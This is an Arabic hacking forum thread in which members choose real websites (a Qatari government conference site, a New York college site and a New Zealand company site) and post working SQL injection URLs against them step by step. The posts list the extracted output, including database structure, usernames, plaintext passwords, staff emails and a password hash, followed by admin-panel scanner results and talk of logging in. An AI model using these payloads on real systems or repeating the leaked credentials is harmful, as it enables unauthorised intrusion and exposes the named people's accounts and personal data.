الهدف الجديد هو موقع وزارة الخارجية لدولة قطر الهدف فقط للتدريب لا اكثر الرابط : http://www.qatar-conferences.org/arab/newsdetail.php?id=3 الموقع...

الحالة
مغلق و غير مفتوح للمزيد من الردود.
غرفة حقن قواعد البيانات {غرفة Sql }
[align=center]الهدف الجديد هو موقع وزارة الخارجية لدولة قطر
الهدف فقط للتدريب لا اكثر
الرابط :
PHP:
http://www.qatar-conferences.org/arab/newsdetail.php?id=3

الموقع تم حقنو يدوي وتم استخراج كامل المعلومات مسبقأ
بالتوفيق
تحياتي

[/align]
 
غرفة حقن قواعد البيانات {غرفة Sql }
[align=center]تصحيح بسيط..
الهدف السابق هو لادارة الموتمرات الخاصة بدولة قطر
تحياتي
[/align]
 
غرفة حقن قواعد البيانات {غرفة Sql }
[align=center]تسلم ايدك على المعلومات
مممم ياريت تكملها نريد الادمن منك مش من غيرك ^_^
خذ وقتك...
وبالنسبة للبقية هذا هدف جديد لكن انا ما حقنتو انتم جربوه :
PHP:
http://www.mcny.edu/news/newsdetail.php?id=389%27

بالتوفيق
تحياتي

[/align]
 

kanvi

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
[align=center]تسلم ايدك على المعلومات
مممم ياريت تكملها نريد الادمن منك مش من غيرك ^_^
خذ وقتك...
وبالنسبة للبقية هذا هدف جديد لكن انا ما حقنتو انتم جربوه :
PHP:
http://www.mcny.edu/news/newsdetail.php?id=389%27
بالتوفيق
تحياتي

[/align]

تم حقن الهدف: الموقع بسيط

اصدر القاعدة

PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,@@version,7,8,9,10,11,12--
5.0.91-community

استخرج اسم القاعدة:

PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
trackrsvp_user:password:audrey_mcnydb

استخراج الجداول:

PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+table_name=0x747261636b727376705f75736572--
PHP:
trackrsvp_user:id:audrey_mcnydb,
trackrsvp_user:username:audrey_mcnydb,
trackrsvp_user:password:audrey_mcnydb,
trackrsvp_user:fname:audrey_mcnydb,
trackrsvp_user:lname:audrey_mcnydb
الحقنة النهائية:
PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(id,0x3a,username,0x3a,password,0x3a,fname,0x3a,lname),7,8,9,10,11,12+from+trackrsvp_user--
1:aoh:test2:Andy:Oh


ملاحظة بسيطة:


نرجو من كل عضو يقوم بالحقن موقع ان يضع مراحل عملية الحقن و ذكر المشكل التي تعرض لها لتعم الفائدة على جميع وحرصا على جملية الموضوع
 
التعديل الأخير:
غرفة حقن قواعد البيانات {غرفة Sql }
الهدف الجديد هو موقع وزارة الخارجية لدولة قطر
الهدف فقط للتدريب لا اكثر
الرابط :
كود PHP:
http://www.qatar-conferences.org/arab/newsdetail.php?id=3

تم حقن الموقع وهذه هي النتائج
لاحظت وجود اكثر من سيجما حالوت ان اجرب عدد منهم وهذه هي النتائج
الجداول التي تحتوي على باس ةورد(لاحظ السيجما)

http://www.qatar-conferences.org/ar...n_name+like+CHAR(37, 112, 97, 115, 115, 37)--

admin_login:password:qatarcon_ararabsummit
admin_login:password:qatarcon_arcomoros
admin_login:password:qatarcon_ardarfur
admin_login:password:qatarcon_ardarfur2
admin_login:password:qatarcon_ardemo10
admin_login:password:qatarcon_ardevelopment
admin_login:password:qatarcon_ardialogue09
admin_login:password:qatarcon_ardialogue10
admin_logi


حقنة استخراج العواميد الموجودة فن الجدول admin_login
http://www.qatar-conferences.org/ar...s+where+table_name=0x61646d696e5f6c6f67696e--

نتيجة الحقنة

admin_login:id:qatarcon_ararabsummit
admin_login:username:qatarcon_ararabsummit
admin_login:password:qatarcon_ararabsummit
admin_login:id:qatarcon_arcomoros
admin_login:username:qatarcon_arcomoros
admin_login:password:qatarcon_arcomoros
admin_login:id:qatarcon_ardarfur
admin_login:username:qatarcon_ardarfur
admin_login:password:qatarcon_ar

لاحظ اختلاف السيجما واستخراج الاعمدة من عدة جداول بنفس الاسم من سيجما مختلفة

حقنة استخراج بيانتا الادمن
http://www.qatar-conferences.org/ar...rname,0x3a,password),3,4,5+from+admin_login--

يمكنك التنقل في السيجما من خلال وضع اسم السيجما في الاستغلال قبل admin_login مسبوقا بـ .
from+admin_login => from+qatarcon_ararabsummit.admin_login

معلومات الادمن (اليوزر بعده الباس)
________________
p4362721
p4362721
________________
dibarab
dibarab
________________
dibarabdemocracy
dibarabdemocracy
________________
p5818834
p5818834
________________
dibdemocracy08
dibdemocracy08
________________
p5818834
p5818834
________________
dibdialogue08
dibdialogue08

لن اضع الحقن التي استخرجت بها المعلومات لاني شرحت الطريقة فوق بل انتم قوموا بذلك للتعلم فقط


يا شباب انا بنصحكم ان لا تبحثوا عن لوحة التحكم
لانه موقع عربي (قطر)
اصلا انا بتوقع ان ما في لوحة تحكم لاني لاحظت ان هذا الموقع كأنه مرتبط مع مواقع حكومية قطرية اخرى
يمكن تكون لوحة تحكم وحدة لهذه المواقع


الغريب ان اسم المستخدم نفسة كلمة السر !!
ارجو من الاخ ماستر مراسلة ادارة الموقع لترقيع الثغرة
 
غرفة حقن قواعد البيانات {غرفة Sql }
تم حقن الهدف: الموقع بسيط

اصدر القاعدة

PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,@@version,7,8,9,10,11,12--
5.0.91-community

استخرج اسم القاعدة:

PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
trackrsvp_user:password:audrey_mcnydb

استخراج الجداول:

PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+table_name=0x747261636b727376705f75736572--
PHP:
trackrsvp_user:id:audrey_mcnydb,
trackrsvp_user:username:audrey_mcnydb,
trackrsvp_user:password:audrey_mcnydb,
trackrsvp_user:fname:audrey_mcnydb,
trackrsvp_user:lname:audrey_mcnydb
الحقنة النهائية:
PHP:
http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(id,0x3a,username,0x3a,password,0x3a,fname,0x3a,lname),7,8,9,10,11,12+from+trackrsvp_user--
1:aoh:test2:Andy:Oh


ملاحظة بسيطة:


نرجو من كل عضو يقوم بالحقن موقع ان يضع مراحل عملية الحقن و ذكر المشكل التي تعرض لها لتعم الفائدة على جميع وحرصا على جملية الموضوع

بارك الله فيك اخي الغالي حقنة رائعة
واصل وننتظر الاخ مستر تيج...
مستر تيج>>مممم اذا واجهة اي مشاكل اطرحها هنا والاخوان ما راح يقصرو معاك
تحياتي
 
غرفة حقن قواعد البيانات {غرفة Sql }
تم حقن الموقع وهذه هي النتائج
لاحظت وجود اكثر من سيجما حالوت ان اجرب عدد منهم وهذه هي النتائج
الجداول التي تحتوي على باس ةورد(لاحظ السيجما)

http://www.qatar-conferences.org/ar...n_name+like+CHAR(37, 112, 97, 115, 115, 37)--

admin_login:password:qatarcon_ararabsummit
admin_login:password:qatarcon_arcomoros
admin_login:password:qatarcon_ardarfur
admin_login:password:qatarcon_ardarfur2
admin_login:password:qatarcon_ardemo10
admin_login:password:qatarcon_ardevelopment
admin_login:password:qatarcon_ardialogue09
admin_login:password:qatarcon_ardialogue10
admin_logi


حقنة استخراج العواميد الموجودة فن الجدول admin_login
http://www.qatar-conferences.org/ar...s+where+table_name=0x61646d696e5f6c6f67696e--

نتيجة الحقنة

admin_login:id:qatarcon_ararabsummit
admin_login:username:qatarcon_ararabsummit
admin_login:password:qatarcon_ararabsummit
admin_login:id:qatarcon_arcomoros
admin_login:username:qatarcon_arcomoros
admin_login:password:qatarcon_arcomoros
admin_login:id:qatarcon_ardarfur
admin_login:username:qatarcon_ardarfur
admin_login:password:qatarcon_ar

لاحظ اختلاف السيجما واستخراج الاعمدة من عدة جداول بنفس الاسم من سيجما مختلفة

حقنة استخراج بيانتا الادمن
http://www.qatar-conferences.org/ar...rname,0x3a,password),3,4,5+from+admin_login--

يمكنك التنقل في السيجما من خلال وضع اسم السيجما في الاستغلال قبل admin_login مسبوقا بـ .
from+admin_login => from+qatarcon_ararabsummit.admin_login

معلومات الادمن (اليوزر بعده الباس)
________________
p4362721
p4362721
________________
dibarab
dibarab
________________
dibarabdemocracy
dibarabdemocracy
________________
p5818834
p5818834
________________
dibdemocracy08
dibdemocracy08
________________
p5818834
p5818834
________________
dibdialogue08
dibdialogue08

لن اضع الحقن التي استخرجت بها المعلومات لاني شرحت الطريقة فوق بل انتم قوموا بذلك للتعلم فقط


يا شباب انا بنصحكم ان لا تبحثوا عن لوحة التحكم
لانه موقع عربي (قطر)
اصلا انا بتوقع ان ما في لوحة تحكم لاني لاحظت ان هذا الموقع كأنه مرتبط مع مواقع حكومية قطرية اخرى
يمكن تكون لوحة تحكم وحدة لهذه المواقع


الغريب ان اسم المستخدم نفسة كلمة السر !!
ارجو من الاخ ماستر مراسلة ادارة الموقع لترقيع الثغرة

[align=center]تسلم ايدك على الحقنة الرائعة
ياريت الاعضاء الباقين يكملوها ويقومو بوضع رابط الحقنة
بعد كل هذه المعلومات صار الموقع سهل جدا..
وبالنسبة للوحة التحكم كلامك سليم
واما بالنسبة لليوزر والباس فاعتقد شي عادي
يعني هما ما واضعين اليوزرات على سكربت ستاف او عاملينها ظاهرة للجميع
وبالاخير ما في لوحة تحكم على هذا الموقع
لانهم رابطينها على سيرفر ثاني
والله اعلم
بارك الله فيك
تحياتي
[/align]
 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
السلام عليكم ورحمة الله تعالى وبركاته
كيف الأحوال
 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
كود:
http://www.mcny.edu/news/newsdetail.php?id=389
الحقنة ركبوها أنتم لتتعلمو الحقن 
==========tables===================
trackrsvp_user:password:audrey_mcnydb
users:password:audrey_mcnydb
wp_posts:post_password:audrey_test
wp_users:user_pass:audrey_test
======columns of table 1================
trackrsvp_user:id:audrey_mcnydb
trackrsvp_user:username:audrey_mcnydb
trackrsvp_user:password:audrey_mcnydb
trackrsvp_user:fname:audrey_mcnydb
trackrsvp_user:lname:audrey_mcnydb
==========columns of table 2============
users:fname:audrey_mcnydb
users:lname:audrey_mcnydb
users:email:audrey_mcnydb
users:department:audrey_mcnydb
users:user_name:audrey_mcnydb
users:password:audrey_mcnydb
users:level:audrey_mcnydb
users:page:audrey_mcnydb
users:user_id:audrey_mcnydb
===================================
الأيدي و يوزر الأدمن و باسوورده
1:aoh:test2
باقي الأعضاء + رقم العضوية + الباس + اليوزر + الإيميل 
1:aoh:test21:aoh:audrey:aoh@mcny.edu
2:erobles:audrey:erobles@mcny.edu
20:mmelendez:news2:MMelendez@mcny.edu
11:scockerl:spagirl:scockerl@mcny.edu
14:sservices:audrey:sts@mcny.edu
13:mfung:dechet0:afung@metropolitan.edu
15:jsantiago:audrey:jsantiago@mcny.edu
16:urban:dialogues:urbandialogues@mcny.edu
18:epena:mcnypena:epena@mcny.edu
6:slenhart:cohen:slenhart@mcny.edu
19:admissions:updates:admissions@mcny.edu
 

HOLACO

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
كود:
http://www.mcny.edu/news/newsdetail.php?id=389
الحقنة ركبوها أنتم لتتعلمو الحقن 
==========tables===================
trackrsvp_user:password:audrey_mcnydb
users:password:audrey_mcnydb
wp_posts:post_password:audrey_test
wp_users:user_pass:audrey_test
======columns of table 1================
trackrsvp_user:id:audrey_mcnydb
trackrsvp_user:username:audrey_mcnydb
trackrsvp_user:password:audrey_mcnydb
trackrsvp_user:fname:audrey_mcnydb
trackrsvp_user:lname:audrey_mcnydb
==========columns of table 2============
users:fname:audrey_mcnydb
users:lname:audrey_mcnydb
users:email:audrey_mcnydb
users:department:audrey_mcnydb
users:user_name:audrey_mcnydb
users:password:audrey_mcnydb
users:level:audrey_mcnydb
users:page:audrey_mcnydb
users:user_id:audrey_mcnydb
===================================
الأيدي و يوزر الأدمن و باسوورده
1:aoh:test2
باقي الأعضاء + رقم العضوية + الباس + اليوزر + الإيميل 
1:aoh:test21:aoh:audrey:aoh@mcny.edu
2:erobles:audrey:erobles@mcny.edu
20:mmelendez:news2:MMelendez@mcny.edu
11:scockerl:spagirl:scockerl@mcny.edu
14:sservices:audrey:sts@mcny.edu
13:mfung:dechet0:afung@metropolitan.edu
15:jsantiago:audrey:jsantiago@mcny.edu
16:urban:dialogues:urbandialogues@mcny.edu
18:epena:mcnypena:epena@mcny.edu
6:slenhart:cohen:slenhart@mcny.edu
19:admissions:updates:admissions@mcny.edu


فعلا ياخى طلعت معايا نفس النتائج بس للاسف الباسوورد او اليوزر خطأ حتى مع تجربه الجدول users

وده مسار اللوحه

http://www.mcny.edu/admin
 

HOLACO

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
الحقنه حقة الجدول wp_users

admin:$P$BpnUNk5EnqUFNcpcDyuuf/KnNUPaOj0

اظن هى الصحيحه

 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
فعلا ياخى طلعت معايا نفس النتائج بس للاسف الباسوورد او اليوزر خطأ حتى مع تجربه الجدول users

وده مسار اللوحه

http://www.mcny.edu/admin

أخي العزيز
الباس و اليوزر صحيحين + المسار اللي أنت وضعتو هو مسار مزيف عاملينو أصحاب السكربتات و في هذا الموقع عملو مبرمج الموقع لإبعاد المخترقين و يمكنك التأكد من صحة كلامي
 

king dragons

New Member
غرفة حقن قواعد البيانات {غرفة Sql }

HOLACO

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
أخي العزيز
الباس و اليوزر صحيحين + المسار اللي أنت وضعتو هو مسار مزيف عاملينو أصحاب السكربتات و في هذا الموقع عملو مبرمج الموقع لإبعاد المخترقين و يمكنك التأكد من صحة كلامي



ياخى اتفضل الموقع ليه اكتر من مسار للدخول وجرتهم كلهم وللاسف اليوزر او الباس خطأ




[+] Found -> http://www.mcny.edu/admin/

[-] Not Found <- http://www.mcny.edu/administrator/
[-] Not Found <- http://www.mcny.edu/moderator/
[-] Not Found <- http://www.mcny.edu/webadmin/
[-] Not Found <- http://www.mcny.edu/adminarea/
[-] Not Found <- http://www.mcny.edu/bb-admin/
[-] Not Found <- http://www.mcny.edu/adminLogin/
[-] Not Found <- http://www.mcny.edu/admin_area/
[-] Not Found <- http://www.mcny.edu/panel-administracion/
[-] Not Found <- http://www.mcny.edu/instadmin/
[-] Not Found <- http://www.mcny.edu/memberadmin/
[-] Not Found <- http://www.mcny.edu/administratorlogin/
[-] Not Found <- http://www.mcny.edu/adm/

[+] Found -> http://www.mcny.edu/admin/account.php


[+] Found -> http://www.mcny.edu/admin/index.php


[+] Found -> http://www.mcny.edu/admin/login.php


[+] Found -> http://www.mcny.edu/admin/admin.php


[+] Found -> http://www.mcny.edu/admin/account.php

[-] Not Found <- http://www.mcny.edu/admin_area/admin.php
[-] Not Found <- http://www.mcny.edu/admin_area/login.php
[-] Not Found <- http://www.mcny.edu/siteadmin/login.php
[-] Not Found <- http://www.mcny.edu/siteadmin/index.php
[-] Not Found <- http://www.mcny.edu/siteadmin/login.html

[+] Found -> http://www.mcny.edu/admin/account.html


[+] Found -> http://www.mcny.edu/admin/index.html


[+] Found -> http://www.mcny.edu/admin/login.html


[+] Found -> http://www.mcny.edu/admin/admin.html

[-] Not Found <- http://www.mcny.edu/admin_area/index.php
[-] Not Found <- http://www.mcny.edu/bb-admin/index.php
[-] Not Found <- http://www.mcny.edu/bb-admin/login.php
[-] Not Found <- http://www.mcny.edu/bb-admin/admin.php

[+] Found -> http://www.mcny.edu/admin/home.php

[-] Not Found <- http://www.mcny.edu/admin_area/login.html
[-] Not Found <- http://www.mcny.edu/admin_area/index.html

[+] Found -> http://www.mcny.edu/admin/controlpanel.php

[-] Not Found <- http://www.mcny.edu/admin.php
[-] Not Found <- http://www.mcny.edu/admincp/index.asp
[-] Not Found <- http://www.mcny.edu/admincp/login.asp
[-] Not Found <- http://www.mcny.edu/admincp/index.html

[+] Found -> http://www.mcny.edu/admin/account.html

[-] Not Found <- http://www.mcny.edu/adminpanel.html
[-] Not Found <- http://www.mcny.edu/webadmin.html
[-] Not Found <- http://www.mcny.edu/webadmin/index.html
[-] Not Found <- http://www.mcny.edu/webadmin/admin.html
[-] Not Found <- http://www.mcny.edu/webadmin/login.html

[+] Found -> http://www.mcny.edu/admin/admin_login.html

[-] Not Found <- http://www.mcny.edu/admin_login.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/l

[+] Found -> http://www.mcny.edu/admin/cp.php

[-] Not Found <- http://www.mcny.edu/cp.php
[-] Not Found <- http://www.mcny.edu/administrator/index.ph
[-] Not Found <- http://www.mcny.edu/administrator/login.ph
[-] Not Found <- http://www.mcny.edu/nsw/admin/login.php
[-] Not Found <- http://www.mcny.edu/webadmin/login.php

[+] Found -> http://www.mcny.edu/admin/admin_login.php

[-] Not Found <- http://www.mcny.edu/admin_login.php
[-] Not Found <- http://www.mcny.edu/administrator/account.
[-] Not Found <- http://www.mcny.edu/administrator.php
[-] Not Found <- http://www.mcny.edu/admin_area/admin.html
[-] Not Found <- http://www.mcny.edu/pages/admin/admin-logi

[+] Found -> http://www.mcny.edu/admin/admin-login.php

[-] Not Found <- http://www.mcny.edu/admin-login.php
[-] Not Found <- http://www.mcny.edu/bb-admin/index.html
[-] Not Found <- http://www.mcny.edu/bb-admin/login.html
[-] Not Found <- http://www.mcny.edu/bb-admin/admin.html

[+] Found -> http://www.mcny.edu/admin/home.html

[-] Not Found <- http://www.mcny.edu/login.php
[-] Not Found <- http://www.mcny.edu/modelsearch/login.php
[-] Not Found <- http://www.mcny.edu/moderator.php
[-] Not Found <- http://www.mcny.edu/moderator/login.php
[-] Not Found <- http://www.mcny.edu/moderator/admin.php
[-] Not Found <- http://www.mcny.edu/account.php
[-] Not Found <- http://www.mcny.edu/pages/admin/admin-logi

[+] Found -> http://www.mcny.edu/admin/admin-login.html

[-] Not Found <- http://www.mcny.edu/admin-login.html
[-] Not Found <- http://www.mcny.edu/controlpanel.php
[-] Not Found <- http://www.mcny.edu/admincontrol.php

[+] Found -> http://www.mcny.edu/admin/adminLogin.html

[-] Not Found <- http://www.mcny.edu/adminLogin.html

[+] Found -> http://www.mcny.edu/admin/adminLogin.html

[-] Not Found <- http://www.mcny.edu/home.html
[-] Not Found <- http://www.mcny.edu/rcjakar/admin/login.ph
[-] Not Found <- http://www.mcny.edu/adminarea/index.html
[-] Not Found <- http://www.mcny.edu/adminarea/admin.html
[-] Not Found <- http://www.mcny.edu/webadmin.php
[-] Not Found <- http://www.mcny.edu/webadmin/index.php
[-] Not Found <- http://www.mcny.edu/webadmin/admin.php

[+] Found -> http://www.mcny.edu/admin/controlpanel.html

[-] Not Found <- http://www.mcny.edu/admin.html

[+] Found -> http://www.mcny.edu/admin/cp.html

[-] Not Found <- http://www.mcny.edu/cp.html
[-] Not Found <- http://www.mcny.edu/adminpanel.php
[-] Not Found <- http://www.mcny.edu/moderator.html
[-] Not Found <- http://www.mcny.edu/administrator/index.ht
[-] Not Found <- http://www.mcny.edu/administrator/login.ht
[-] Not Found <- http://www.mcny.edu/user.html
[-] Not Found <- http://www.mcny.edu/administrator/account.
[-] Not Found <- http://www.mcny.edu/administrator.html
[-] Not Found <- http://www.mcny.edu/login.html
[-] Not Found <- http://www.mcny.edu/modelsearch/login.html
[-] Not Found <- http://www.mcny.edu/moderator/login.html
[-] Not Found <- http://www.mcny.edu/adminarea/login.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/i
[-] Not Found <- http://www.mcny.edu/panel-administracion/a
[-] Not Found <- http://www.mcny.edu/modelsearch/index.html
[-] Not Found <- http://www.mcny.edu/modelsearch/admin.html
[-] Not Found <- http://www.mcny.edu/admincontrol/login.htm
[-] Not Found <- http://www.mcny.edu/adm/index.html
[-] Not Found <- http://www.mcny.edu/adm.html
[-] Not Found <- http://www.mcny.edu/moderator/admin.html
[-] Not Found <- http://www.mcny.edu/user.php
[-] Not Found <- http://www.mcny.edu/account.html
[-] Not Found <- http://www.mcny.edu/controlpanel.html
[-] Not Found <- http://www.mcny.edu/admincontrol.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/l
[-] Not Found <- http://www.mcny.edu/wp-login.php
[-] Not Found <- http://www.mcny.edu/adminLogin.php

[+] Found -> http://www.mcny.edu/admin/adminLogin.php

[-] Not Found <- http://www.mcny.edu/home.php
[-] Not Found <- http://www.mcny.edu/admin.php
[-] Not Found <- http://www.mcny.edu/adminarea/index.php
[-] Not Found <- http://www.mcny.edu/adminarea/admin.php
[-] Not Found <- http://www.mcny.edu/adminarea/login.php
[-] Not Found <- http://www.mcny.edu/panel-administracion/i
[-] Not Found <- http://www.mcny.edu/panel-administracion/a
[-] Not Found <- http://www.mcny.edu/modelsearch/index.php
[-] Not Found <- http://www.mcny.edu/modelsearch/admin.php
[-] Not Found <- http://www.mcny.edu/admincontrol/login.php
[-] Not Found <- http://www.mcny.edu/adm/admloginuser.php
[-] Not Found <- http://www.mcny.edu/admloginuser.php
[-] Not Found <- http://www.mcny.edu/admin2.php
[-] Not Found <- http://www.mcny.edu/admin2/login.php
[-] Not Found <- http://www.mcny.edu/admin2/index.php
[-] Not Found <- http://www.mcny.edu/adm/index.php
[-] Not Found <- http://www.mcny.edu/adm.php
[-] Not Found <- http://www.mcny.edu/affiliate.php
[-] Not Found <- http://www.mcny.edu/adm_auth.php
[-] Not Found <- http://www.mcny.edu/memberadmin.php
[-] Not Found <- http://www.mcny.edu/administratorlogin.php
 

d4rK-h4ck3r

New Member
غرفة حقن قواعد البيانات {غرفة Sql }




السلام عليكم


كود:
http://www.konka.co.nz/productdetail.php?id=-33+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15+from+users--
المعلومات :

user:pass
admin:admin
admin1:admin1
test1:testt


والسلام عليكم

perfect no more :Great:
 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
ياخى اتفضل الموقع ليه اكتر من مسار للدخول وجرتهم كلهم وللاسف اليوزر او الباس خطأ




[+] Found -> http://www.mcny.edu/admin/

[-] Not Found <- http://www.mcny.edu/administrator/
[-] Not Found <- http://www.mcny.edu/moderator/
[-] Not Found <- http://www.mcny.edu/webadmin/
[-] Not Found <- http://www.mcny.edu/adminarea/
[-] Not Found <- http://www.mcny.edu/bb-admin/
[-] Not Found <- http://www.mcny.edu/adminLogin/
[-] Not Found <- http://www.mcny.edu/admin_area/
[-] Not Found <- http://www.mcny.edu/panel-administracion/
[-] Not Found <- http://www.mcny.edu/instadmin/
[-] Not Found <- http://www.mcny.edu/memberadmin/
[-] Not Found <- http://www.mcny.edu/administratorlogin/
[-] Not Found <- http://www.mcny.edu/adm/

[+] Found -> http://www.mcny.edu/admin/account.php


[+] Found -> http://www.mcny.edu/admin/index.php


[+] Found -> http://www.mcny.edu/admin/login.php


[+] Found -> http://www.mcny.edu/admin/admin.php


[+] Found -> http://www.mcny.edu/admin/account.php

[-] Not Found <- http://www.mcny.edu/admin_area/admin.php
[-] Not Found <- http://www.mcny.edu/admin_area/login.php
[-] Not Found <- http://www.mcny.edu/siteadmin/login.php
[-] Not Found <- http://www.mcny.edu/siteadmin/index.php
[-] Not Found <- http://www.mcny.edu/siteadmin/login.html

[+] Found -> http://www.mcny.edu/admin/account.html


[+] Found -> http://www.mcny.edu/admin/index.html


[+] Found -> http://www.mcny.edu/admin/login.html


[+] Found -> http://www.mcny.edu/admin/admin.html

[-] Not Found <- http://www.mcny.edu/admin_area/index.php
[-] Not Found <- http://www.mcny.edu/bb-admin/index.php
[-] Not Found <- http://www.mcny.edu/bb-admin/login.php
[-] Not Found <- http://www.mcny.edu/bb-admin/admin.php

[+] Found -> http://www.mcny.edu/admin/home.php

[-] Not Found <- http://www.mcny.edu/admin_area/login.html
[-] Not Found <- http://www.mcny.edu/admin_area/index.html

[+] Found -> http://www.mcny.edu/admin/controlpanel.php

[-] Not Found <- http://www.mcny.edu/admin.php
[-] Not Found <- http://www.mcny.edu/admincp/index.asp
[-] Not Found <- http://www.mcny.edu/admincp/login.asp
[-] Not Found <- http://www.mcny.edu/admincp/index.html

[+] Found -> http://www.mcny.edu/admin/account.html

[-] Not Found <- http://www.mcny.edu/adminpanel.html
[-] Not Found <- http://www.mcny.edu/webadmin.html
[-] Not Found <- http://www.mcny.edu/webadmin/index.html
[-] Not Found <- http://www.mcny.edu/webadmin/admin.html
[-] Not Found <- http://www.mcny.edu/webadmin/login.html

[+] Found -> http://www.mcny.edu/admin/admin_login.html

[-] Not Found <- http://www.mcny.edu/admin_login.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/l

[+] Found -> http://www.mcny.edu/admin/cp.php

[-] Not Found <- http://www.mcny.edu/cp.php
[-] Not Found <- http://www.mcny.edu/administrator/index.ph
[-] Not Found <- http://www.mcny.edu/administrator/login.ph
[-] Not Found <- http://www.mcny.edu/nsw/admin/login.php
[-] Not Found <- http://www.mcny.edu/webadmin/login.php

[+] Found -> http://www.mcny.edu/admin/admin_login.php

[-] Not Found <- http://www.mcny.edu/admin_login.php
[-] Not Found <- http://www.mcny.edu/administrator/account.
[-] Not Found <- http://www.mcny.edu/administrator.php
[-] Not Found <- http://www.mcny.edu/admin_area/admin.html
[-] Not Found <- http://www.mcny.edu/pages/admin/admin-logi

[+] Found -> http://www.mcny.edu/admin/admin-login.php

[-] Not Found <- http://www.mcny.edu/admin-login.php
[-] Not Found <- http://www.mcny.edu/bb-admin/index.html
[-] Not Found <- http://www.mcny.edu/bb-admin/login.html
[-] Not Found <- http://www.mcny.edu/bb-admin/admin.html

[+] Found -> http://www.mcny.edu/admin/home.html

[-] Not Found <- http://www.mcny.edu/login.php
[-] Not Found <- http://www.mcny.edu/modelsearch/login.php
[-] Not Found <- http://www.mcny.edu/moderator.php
[-] Not Found <- http://www.mcny.edu/moderator/login.php
[-] Not Found <- http://www.mcny.edu/moderator/admin.php
[-] Not Found <- http://www.mcny.edu/account.php
[-] Not Found <- http://www.mcny.edu/pages/admin/admin-logi

[+] Found -> http://www.mcny.edu/admin/admin-login.html

[-] Not Found <- http://www.mcny.edu/admin-login.html
[-] Not Found <- http://www.mcny.edu/controlpanel.php
[-] Not Found <- http://www.mcny.edu/admincontrol.php

[+] Found -> http://www.mcny.edu/admin/adminLogin.html

[-] Not Found <- http://www.mcny.edu/adminLogin.html

[+] Found -> http://www.mcny.edu/admin/adminLogin.html

[-] Not Found <- http://www.mcny.edu/home.html
[-] Not Found <- http://www.mcny.edu/rcjakar/admin/login.ph
[-] Not Found <- http://www.mcny.edu/adminarea/index.html
[-] Not Found <- http://www.mcny.edu/adminarea/admin.html
[-] Not Found <- http://www.mcny.edu/webadmin.php
[-] Not Found <- http://www.mcny.edu/webadmin/index.php
[-] Not Found <- http://www.mcny.edu/webadmin/admin.php

[+] Found -> http://www.mcny.edu/admin/controlpanel.html

[-] Not Found <- http://www.mcny.edu/admin.html

[+] Found -> http://www.mcny.edu/admin/cp.html

[-] Not Found <- http://www.mcny.edu/cp.html
[-] Not Found <- http://www.mcny.edu/adminpanel.php
[-] Not Found <- http://www.mcny.edu/moderator.html
[-] Not Found <- http://www.mcny.edu/administrator/index.ht
[-] Not Found <- http://www.mcny.edu/administrator/login.ht
[-] Not Found <- http://www.mcny.edu/user.html
[-] Not Found <- http://www.mcny.edu/administrator/account.
[-] Not Found <- http://www.mcny.edu/administrator.html
[-] Not Found <- http://www.mcny.edu/login.html
[-] Not Found <- http://www.mcny.edu/modelsearch/login.html
[-] Not Found <- http://www.mcny.edu/moderator/login.html
[-] Not Found <- http://www.mcny.edu/adminarea/login.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/i
[-] Not Found <- http://www.mcny.edu/panel-administracion/a
[-] Not Found <- http://www.mcny.edu/modelsearch/index.html
[-] Not Found <- http://www.mcny.edu/modelsearch/admin.html
[-] Not Found <- http://www.mcny.edu/admincontrol/login.htm
[-] Not Found <- http://www.mcny.edu/adm/index.html
[-] Not Found <- http://www.mcny.edu/adm.html
[-] Not Found <- http://www.mcny.edu/moderator/admin.html
[-] Not Found <- http://www.mcny.edu/user.php
[-] Not Found <- http://www.mcny.edu/account.html
[-] Not Found <- http://www.mcny.edu/controlpanel.html
[-] Not Found <- http://www.mcny.edu/admincontrol.html
[-] Not Found <- http://www.mcny.edu/panel-administracion/l
[-] Not Found <- http://www.mcny.edu/wp-login.php
[-] Not Found <- http://www.mcny.edu/adminLogin.php

[+] Found -> http://www.mcny.edu/admin/adminLogin.php

[-] Not Found <- http://www.mcny.edu/home.php
[-] Not Found <- http://www.mcny.edu/admin.php
[-] Not Found <- http://www.mcny.edu/adminarea/index.php
[-] Not Found <- http://www.mcny.edu/adminarea/admin.php
[-] Not Found <- http://www.mcny.edu/adminarea/login.php
[-] Not Found <- http://www.mcny.edu/panel-administracion/i
[-] Not Found <- http://www.mcny.edu/panel-administracion/a
[-] Not Found <- http://www.mcny.edu/modelsearch/index.php
[-] Not Found <- http://www.mcny.edu/modelsearch/admin.php
[-] Not Found <- http://www.mcny.edu/admincontrol/login.php
